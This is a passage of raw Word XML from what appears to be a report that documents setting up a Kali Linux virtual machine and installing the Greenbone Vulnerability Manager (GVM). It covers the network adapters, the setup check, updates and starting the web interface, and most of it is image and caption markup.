          <w:rFonts w:eastAsia="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="222" w:name="_Toc111363608"/>
      <w:bookmarkStart w:id="223" w:name="_Toc111363745"/>
      <w:bookmarkStart w:id="224" w:name="_Toc111981769"/>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>44</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="00B80C57">
        <w:t>Kali</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Virtual Machine</w:t>
      </w:r>
      <w:bookmarkEnd w:id="222"/>
      <w:bookmarkEnd w:id="223"/>
      <w:bookmarkEnd w:id="224"/>
    </w:p>
    <w:p w14:paraId="6C9C4EE0" w14:textId="77777777" w:rsidR="00DF42B8" w:rsidRDefault="00DF42B8" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="40FD2072" w14:textId="4CD7605C" w:rsidR="00DF42B8" w:rsidRDefault="00DF42B8" w:rsidP="006B521F">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:ind w:left="851"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Two network adapters were installed, the first one was a bridged adapter so that the GVM software could use the loopback address of the virtual machine, figure </w:t>
      </w:r>
      <w:r w:rsidR="00DA460C">
        <w:t>45</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49D27C4C" w14:textId="77777777" w:rsidR="00DF42B8" w:rsidRDefault="00DF42B8" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6E1C4F36" wp14:editId="1010AAE4">
            <wp:extent cx="5871622" cy="2142963"/>
            <wp:effectExtent l="19050" t="19050" r="15240" b="10160"/>
            <wp:docPr id="45" name="Picture 4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Graphical user interface, text, application, email&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId61"/>
                    <a:srcRect b="2441"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5878646" cy="2145527"/>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AF74302" w14:textId="0A2FE126" w:rsidR="00DF42B8" w:rsidRDefault="00DF42B8" w:rsidP="00991450">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
      <w:bookmarkStart w:id="225" w:name="_Toc111363609"/>
      <w:bookmarkStart w:id="226" w:name="_Toc111363746"/>
      <w:bookmarkStart w:id="227" w:name="_Toc111981770"/>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>45</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t>: Bridged Adapter Network 1</w:t>
      </w:r>
      <w:bookmarkEnd w:id="225"/>
      <w:bookmarkEnd w:id="226"/>
      <w:bookmarkEnd w:id="227"/>
    </w:p>
    <w:p w14:paraId="6AD25D92" w14:textId="77777777" w:rsidR="00DF42B8" w:rsidRDefault="00DF42B8" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="235C8C92" w14:textId="4B604B64" w:rsidR="00DF42B8" w:rsidRPr="00CB3420" w:rsidRDefault="00DF42B8" w:rsidP="006B521F">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:ind w:left="851"/>
      </w:pPr>
      <w:r>
        <w:t>Figur</w:t>
      </w:r>
      <w:r w:rsidR="0074147D">
        <w:t xml:space="preserve">e </w:t>
      </w:r>
      <w:r w:rsidR="00DA460C">
        <w:t>46</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> sets out the creation of a second network card with a NAT adapter to enable network access</w:t>
      </w:r>
      <w:r w:rsidR="0074147D">
        <w:t xml:space="preserve"> externally</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3089917C" w14:textId="77777777" w:rsidR="00DF42B8" w:rsidRDefault="00DF42B8" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5DB4689B" wp14:editId="07DB8D63">
            <wp:extent cx="5903409" cy="2119716"/>
            <wp:effectExtent l="19050" t="19050" r="21590" b="13970"/>
            <wp:docPr id="44" name="Picture 4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Graphical user interface, text, application&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId62"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5922634" cy="2126619"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="accent1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="289F10B9" w14:textId="28DE3AA1" w:rsidR="00DF42B8" w:rsidRDefault="00DF42B8" w:rsidP="00991450">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
      <w:bookmarkStart w:id="228" w:name="_Toc111363610"/>
      <w:bookmarkStart w:id="229" w:name="_Toc111363747"/>
      <w:bookmarkStart w:id="230" w:name="_Toc111981771"/>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>46</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t>: NAT Adapter Network 2</w:t>
      </w:r>
      <w:bookmarkEnd w:id="228"/>
      <w:bookmarkEnd w:id="229"/>
      <w:bookmarkEnd w:id="230"/>
    </w:p>
    <w:p w14:paraId="79515867" w14:textId="77777777" w:rsidR="00DF42B8" w:rsidRDefault="00DF42B8" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="40B96765" w14:textId="0CCBCD9C" w:rsidR="00DF42B8" w:rsidRDefault="00061C7E" w:rsidP="00991450">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:br w:type="column"/>
      </w:r>
      <w:bookmarkStart w:id="231" w:name="_Toc113190744"/>
      <w:r w:rsidR="00DF42B8">
        <w:lastRenderedPageBreak/>
        <w:t>4.4.5</w:t>
      </w:r>
      <w:r w:rsidR="00DF42B8">
        <w:tab/>
        <w:t>GVM Installation</w:t>
      </w:r>
      <w:bookmarkEnd w:id="231"/>
    </w:p>
    <w:p w14:paraId="23C070D3" w14:textId="1D4189A5" w:rsidR="00DF42B8" w:rsidRDefault="00DF42B8" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">GVM was installed on to the virtual machine as illustrated in figure </w:t>
      </w:r>
      <w:r w:rsidR="00DA460C">
        <w:t>47</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28B50E0B" w14:textId="77777777" w:rsidR="00DF42B8" w:rsidRDefault="00DF42B8" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="30C0EAE1" wp14:editId="73FF83D7">
            <wp:extent cx="5780388" cy="4051300"/>
            <wp:effectExtent l="19050" t="19050" r="11430" b="25400"/>
            <wp:docPr id="41" name="Picture 4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Text&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId63"/>
                    <a:srcRect l="894" r="4275"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5788332" cy="4056868"/>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4E88919" w14:textId="202942E7" w:rsidR="00DF42B8" w:rsidRDefault="00DF42B8" w:rsidP="00991450">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
      <w:bookmarkStart w:id="232" w:name="_Toc111363611"/>
      <w:bookmarkStart w:id="233" w:name="_Toc111363748"/>
      <w:bookmarkStart w:id="234" w:name="_Toc111981772"/>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>47</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t>: Installation of GVM</w:t>
      </w:r>
      <w:bookmarkEnd w:id="232"/>
      <w:bookmarkEnd w:id="233"/>
      <w:bookmarkEnd w:id="234"/>
    </w:p>
    <w:p w14:paraId="27E05A67" w14:textId="77777777" w:rsidR="00DF42B8" w:rsidRPr="004A48D9" w:rsidRDefault="00DF42B8" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A7C164F" w14:textId="4800702B" w:rsidR="00DF42B8" w:rsidRPr="00106CB8" w:rsidRDefault="00DF42B8" w:rsidP="0074147D">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:ind w:left="851" w:hanging="709"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">To ensure that GVM was set up correctly “gvm-check-setup” was run as outlined in figure </w:t>
      </w:r>
      <w:r w:rsidR="00DA460C">
        <w:t>48</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4570B7AE" w14:textId="77777777" w:rsidR="00DF42B8" w:rsidRDefault="00DF42B8" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2C71C199" wp14:editId="231CD30A">
            <wp:extent cx="5973672" cy="1070010"/>
            <wp:effectExtent l="19050" t="19050" r="27305" b="15875"/>
            <wp:docPr id="224" name="Picture 2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Picture 224" descr="Graphical user interface, application&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId64"/>
                    <a:srcRect l="719" t="4407" b="4754"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6001046" cy="1074913"/>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0436608" w14:textId="1F25ACFE" w:rsidR="00DF42B8" w:rsidRDefault="00DF42B8" w:rsidP="00991450">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
      <w:bookmarkStart w:id="235" w:name="_Toc111363612"/>
      <w:bookmarkStart w:id="236" w:name="_Toc111363749"/>
      <w:bookmarkStart w:id="237" w:name="_Toc111981773"/>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>48</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t>: Check GVM Setup</w:t>
      </w:r>
      <w:bookmarkEnd w:id="235"/>
      <w:bookmarkEnd w:id="236"/>
      <w:bookmarkEnd w:id="237"/>
    </w:p>
    <w:p w14:paraId="04ADEFE4" w14:textId="77777777" w:rsidR="00DF42B8" w:rsidRPr="00704038" w:rsidRDefault="00DF42B8" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5672F661" w14:textId="57297A1A" w:rsidR="00DF42B8" w:rsidRDefault="21523073" w:rsidP="001F20D1">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:ind w:left="851"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>To ensure that the software being used was up to date “apt update &amp;&amp; apt upgrade -y” was implemented on Kali each time it was used as outlined in figure </w:t>
      </w:r>
      <w:r w:rsidR="00DA460C">
        <w:t>49</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1362C55A" w14:textId="77777777" w:rsidR="00DF42B8" w:rsidRDefault="00DF42B8" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="23D8F2E9" wp14:editId="54EBAB09">
            <wp:extent cx="5944814" cy="1830298"/>
            <wp:effectExtent l="19050" t="19050" r="18415" b="17780"/>
            <wp:docPr id="42" name="Picture 4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Text&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId65"/>
                    <a:srcRect l="878" r="746" b="4877"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5980196" cy="1841191"/>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F39C691" w14:textId="07A9BF4B" w:rsidR="00DF42B8" w:rsidRDefault="00DF42B8" w:rsidP="00991450">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
      <w:bookmarkStart w:id="238" w:name="_Toc111363613"/>
      <w:bookmarkStart w:id="239" w:name="_Toc111363750"/>
      <w:bookmarkStart w:id="240" w:name="_Toc111981774"/>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>49</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t>: Kali Update and Upgrade</w:t>
      </w:r>
      <w:bookmarkEnd w:id="238"/>
      <w:bookmarkEnd w:id="239"/>
      <w:bookmarkEnd w:id="240"/>
    </w:p>
    <w:p w14:paraId="76837D57" w14:textId="77777777" w:rsidR="00DF42B8" w:rsidRPr="00CF5CAB" w:rsidRDefault="00DF42B8" w:rsidP="001F20D1">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:spacing w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D6C7C8D" w14:textId="026BE0B6" w:rsidR="00DF42B8" w:rsidRDefault="00DF42B8" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:ind w:left="709" w:firstLine="11"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">As GVM uses the latest vulnerability and exploitation database this also had to be updated before each use as illustrated in figure </w:t>
      </w:r>
      <w:r w:rsidR="001F20D1">
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidR="00DA460C">
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35F2F022" w14:textId="77777777" w:rsidR="00DF42B8" w:rsidRDefault="00DF42B8" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="700D62AA" wp14:editId="4C8F1143">
            <wp:extent cx="5981058" cy="813054"/>
            <wp:effectExtent l="19050" t="19050" r="20320" b="25400"/>
            <wp:docPr id="43" name="Picture 4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Text&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId66"/>
                    <a:srcRect t="5907"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6064593" cy="824410"/>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3F32A0F" w14:textId="64F2BD40" w:rsidR="00DF42B8" w:rsidRDefault="00DF42B8" w:rsidP="00991450">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
      <w:bookmarkStart w:id="241" w:name="_Toc111363614"/>
      <w:bookmarkStart w:id="242" w:name="_Toc111363751"/>
      <w:bookmarkStart w:id="243" w:name="_Toc111981775"/>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>50</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t>: GVM Database Update</w:t>
      </w:r>
      <w:bookmarkEnd w:id="241"/>
      <w:bookmarkEnd w:id="242"/>
      <w:bookmarkEnd w:id="243"/>
    </w:p>
    <w:p w14:paraId="62A155E4" w14:textId="77777777" w:rsidR="00DF42B8" w:rsidRDefault="00DF42B8" w:rsidP="001F20D1">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:spacing w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="715313D8" w14:textId="13ECCFAF" w:rsidR="00DF42B8" w:rsidRPr="007862A1" w:rsidRDefault="00DF42B8" w:rsidP="001F20D1">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:ind w:left="851"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The applications tab was opened and the ‘Vulnerability Analysis’ section was chosen. Within this drop-down menu ‘gvm start’ was selected as illustrated in figure </w:t>
      </w:r>
      <w:r w:rsidR="001F20D1">
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidR="00DA460C">
        <w:t>1.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B2D4573" w14:textId="77777777" w:rsidR="00DF42B8" w:rsidRDefault="00DF42B8" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="27961AC6" wp14:editId="448DD2D4">
            <wp:extent cx="4170973" cy="3246634"/>
            <wp:effectExtent l="19050" t="19050" r="20320" b="11430"/>
            <wp:docPr id="235" name="Picture 23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Picture 235" descr="A screenshot of a computer&#10;&#10;Description automatically generated with medium confidence"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId67"/>
                    <a:srcRect l="562" r="23276" b="1194"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4171306" cy="3246893"/>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32CE098C" w14:textId="1CE1C797" w:rsidR="00DF42B8" w:rsidRDefault="00DF42B8" w:rsidP="00991450">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
      <w:bookmarkStart w:id="244" w:name="_Toc111363615"/>
      <w:bookmarkStart w:id="245" w:name="_Toc111363752"/>
      <w:bookmarkStart w:id="246" w:name="_Toc111981776"/>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>51</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t>: GVM Start</w:t>
      </w:r>
      <w:bookmarkEnd w:id="244"/>
      <w:bookmarkEnd w:id="245"/>
      <w:bookmarkEnd w:id="246"/>
    </w:p>
    <w:p w14:paraId="2550FF40" w14:textId="77777777" w:rsidR="00DF42B8" w:rsidRDefault="00DF42B8" w:rsidP="001F20D1">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:spacing w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F5D075A" w14:textId="36EA2B57" w:rsidR="00DF42B8" w:rsidRDefault="00DF42B8" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:ind w:firstLine="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The command line is opened as illustrated in </w:t>
      </w:r>
      <w:r w:rsidR="001F20D1">
        <w:t xml:space="preserve">figure </w:t>
      </w:r>
      <w:r w:rsidR="00DA460C">
        <w:t>52</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EEFDE04" w14:textId="77777777" w:rsidR="00DF42B8" w:rsidRDefault="00DF42B8" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0FDDF200" wp14:editId="50999B74">
            <wp:extent cx="5405382" cy="1758379"/>
            <wp:effectExtent l="19050" t="19050" r="24130" b="13335"/>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8">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect l="1522" r="14283" b="1830"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5413782" cy="1761112"/>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7324FC84" w14:textId="122ACB33" w:rsidR="00DF42B8" w:rsidRDefault="00DF42B8" w:rsidP="00991450">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
      <w:bookmarkStart w:id="247" w:name="_Toc111363616"/>
      <w:bookmarkStart w:id="248" w:name="_Toc111363753"/>
      <w:bookmarkStart w:id="249" w:name="_Toc111981777"/>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>52</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t>: GVM start on command line</w:t>
      </w:r>
      <w:bookmarkEnd w:id="247"/>
      <w:bookmarkEnd w:id="248"/>
      <w:bookmarkEnd w:id="249"/>
    </w:p>
    <w:p w14:paraId="6CF85594" w14:textId="77777777" w:rsidR="00DF42B8" w:rsidRDefault="00DF42B8" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0DF7F1E6" w14:textId="0FC45C9F" w:rsidR="00DF42B8" w:rsidRPr="006D0E35" w:rsidRDefault="00DF42B8" w:rsidP="006B521F">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:ind w:left="851"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidR="00DA460C">
        <w:t>53</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001F20D1">
        <w:t>demonstrates</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> the web browser being automatically opened by GVM on 127.0.0.1 port 9392.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C07C404" w14:textId="5800D257" w:rsidR="00DF42B8" w:rsidRDefault="00061C7E" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251558912" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="32924114" wp14:editId="1667E485">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>76964</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>3750310</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5168685" cy="340963"/>
                <wp:effectExtent l="0" t="0" r="13335" b="21590"/>
                <wp:wrapNone/>
                <wp:docPr id="294847897" name="Rectangle 294847897"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5168685" cy="340963"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:noFill/>
                        <a:ln w="1905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B650AC" id="Rectangle 294847897" o:spid="_x0000_s1026" style="position:absolute;margin-left:6.05pt;margin-top:295.3pt;width:407pt;height:26.85pt;z-index:251558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" filled="f" strokecolor="#c00000" strokeweight="1.5pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00DF42B8">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2FED867C" wp14:editId="464D189D">
            <wp:extent cx="5629576" cy="4284324"/>
            <wp:effectExtent l="19050" t="19050" r="9525" b="21590"/>
